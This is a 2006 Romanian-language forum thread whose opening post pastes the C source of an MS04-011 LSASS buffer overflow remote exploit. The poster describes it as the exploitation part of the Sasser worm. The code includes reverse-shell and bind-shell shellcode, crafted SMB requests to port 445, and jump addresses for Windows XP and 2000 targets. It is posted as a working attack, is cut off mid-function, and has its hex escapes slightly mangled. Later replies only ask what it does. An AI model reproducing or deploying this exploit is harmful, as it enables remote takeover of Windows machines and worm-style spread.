axxl2006 Posted July 23, 2006 Report Posted July 23, 2006 #include <stdio.h>#include <string.h>#include <netdb.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <sys/types.h>#include <arpa/inet.h>// reverse shellcodeunsigned char reverseshell[] ="xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA""xEBx05xE8xEBxFFxFFxFF""x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12""xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99""x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12""x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99""x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9""xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D""x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA""xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32""x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10""xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8""xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66""xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5""x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8""x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A""x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12""x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A""x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C""x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33""xF9x7ExE0x5FxE0";// bind shellcodeunsigned char bindshell[] ="xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA""xEBx05xE8xEBxFFxFFxFF""x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12""xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A""x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6""x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D""xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A""x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58""x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0""x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41""xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B""x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D""xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA""x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10""x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF""xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8""xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79""xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C""x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59""x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD""xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC""xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5""xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6""xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0""xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED""x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";char req1[] ="x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F""x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02""x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F""x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70""x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30""x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54""x20x4Cx4Dx20x30x2Ex31x32x00";char req2[] ="x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00""x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E""x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00""x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00""x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00""x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00""x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00""x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00""x2Ex00x30x00x00x00x00x00";char req3[] ="x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00""x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E""x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46""x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40""x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40""x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48""x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF""x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00""x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00""x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00""x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00""x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";char req4[] ="x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00""x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00""x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00""x49x00x50x00x43x00x24""x00x00x00x3Fx3Fx3Fx3Fx3Fx00";char req5[] ="x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04""x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00""x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00""x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00""x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00""x72x00x70x00x63x00x00x00";char req6[] ="x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04""x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00""x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02""x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00""x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00""x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00""x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11""x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A""xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";char req7[] ="x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04""x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00""x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02""x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00""x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00""xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00""xECx03x00x00x00x00x00x00xECx03x00x00";// room for shellcode here ...char shit1[] ="x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00""x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";char req8[] ="x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE""x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF""xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00""x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00""x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00""x00x00x00x00xADx0Dx00x00";// room for shellcode here ...char req9[] ="x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01""x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00""x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02""x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00""x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00""x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00";char shit3[] ="x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00""x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";#define LEN 3500#define BUFSIZE 2000#define NOP 0x90struct targets {int num;char name[50];long jmpaddr;} ttarget[]= {{ 0, "WinXP Professional   [universal] lsass.exe ", 0x01004600 }, // jmp esp addr{ 1, "Win2k Professional   [universal] netrap.dll", 0x7515123c }, // jmp ebx addr{ 2, "Win2k Advanced Server [sP4]    netrap.dll", 0x751c123c }, // jmp ebx addr};void usage(char *prog){int i;printf("Usage:nn");printf("%s <target> <victim IP> <bindport> [connectback IP] [options]nn", prog);printf("Targets:n");for (i=0; i<3; i++)printf(" %d [0x%.8x]: %sn", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name);printf("nOptions:n");printf(" -t: Detect remote OS:n");printf(" Windows 5.1 - WinXPn");printf(" Windows 5.0 - Win2knn");exit(0);}int main(int argc, char *argv[]){int i;int opt = 0;char *target;char hostipc[40];char hostipc2[40*2];unsigned short port;unsigned long ip;unsigned char *sc;char buf[LEN+1];char sendbuf[(LEN+1)*2];char req4u[sizeof(req4)+20];char screq[bUFSIZE+sizeof(req7)+1500+440];char screq2k[4348+4060];char screq2k2[4348+4060];char recvbuf[1600];char strasm[]="x66x81xECx1Cx07xFFxE4";char strBuffer[bUFSIZE];unsigned int targetnum = 0;int len, sockfd;short dport = 445;struct hostent *he;struct sockaddr_in their_addr;char smblen;char unclen;printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n");printf("--- Coded by .::[ houseofdabus ]::. ---nn");if (argc < 4) {usage(argv[0]);}target = argv[2];sprintf((char *)hostipc,"%sipc$", target);for (i=0; i<40; i++) {hostipc2[i*2] = hostipc[i];hostipc2[i*2+1] = 0;}memcpy(req4u, req4, sizeof(req4)-1);memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);smblen = 52+(char)strlen(hostipc)*2;memcpy(req4u+3, &smblen, 1);unclen = 9 + (char)strlen(hostipc)*2;memcpy(req4u+45, &unclen, 1);if (argc > 4)if (!memcmp(argv[4], "-t", 2)) opt = 1;if ( (argc > 4) && !opt ) {port = htons(atoi(argv[3]))^(unsigned short int)0x9999;ip = inet_addr(argv[4])^(unsigned long int)0x99999999;memcpy(&reverseshell[118], &port, 2);memcpy(&reverseshell[111], &ip, 4);sc = reverseshell;} else {port = htons(atoi(argv[3]))^(unsigned short int)0x9999;memcpy(&bindshell[176], &port, 2);sc = bindshell;}if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {memset(buf, NOP, LEN);//memcpy(&buf[2020], "x3cx12x15x75", 4);memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);memcpy(&buf[2036], sc, strlen(sc));memcpy(&buf[2840], "xebx06xebx06", 4);memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr//memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addrmemcpy(&buf[2856], sc, strlen(sc));for (i=0; i<LEN; i++) {sendbuf[i*2] = buf[i];sendbuf[i*2+1] = 0;}sendbuf[LEN*2]=0;sendbuf[LEN*2+1]=0;memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);} else {memset(strBuffer, NOP, BUFSIZE);memcpy(strBuffer+160, sc, strlen(sc));memcpy(strBuffer+1980, strasm, strlen(strasm));*(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;}memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);if ((he=gethostbyname(argv[2])) == NULL) { // get the host infoperror("[-] gethostbyname ");exit(1);}if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {perror("socket");exit(1);}their_addr.sin_family = AF_INET;their_addr.sin_port = htons(dport);their_addr.sin_addr = *((struct in_addr *)he->h_addr);memset(&(their_addr.sin_zero), ' Quote
ecstazy_kid Posted July 23, 2006 Report Posted July 23, 2006 1. Facut in C++2. ceva detali mai poti da , daca se paote ex: la ce foloseste mai exact Quote
virusz Posted July 23, 2006 Report Posted July 23, 2006 dupa prima vedere,(nu m-am uitat mai exact) nu este sursa virusului saser. e numai exploitul prin care acest worm intra..... repet nu sunt sigur, mai bine ne spune cel care a postat ... Quote
!_30 Posted July 23, 2006 Report Posted July 23, 2006 sau doar a facut rost de un astfel de worm , i-a luat codul sursa si ni l-a dat copy-paste , pentr a-l putea modifca dupa propiul plac , si apoi , complicam , si sa generam executabilul ?Daca nu e asa cred ca ar fi trebuit ca titlul sau macar descrierea ostului sa curpinda si o mica explicatie , ce este si ce face ?! Quote
axxl2006 Posted July 23, 2006 Author Report Posted July 23, 2006 este doar o parte din codul sursa a worm-ului Sasser. Dupa cum va puteti da seama este doar partea prin care exploateaza vulnerabilitatea lsass. lipsesc codurile sursa pt serverul ftp, instalarea lui si cheile din registry, copierea lui pe pc-ul victimei, generarea unui ip random si exploatarea lui...si altele, depinde de versiune. Quote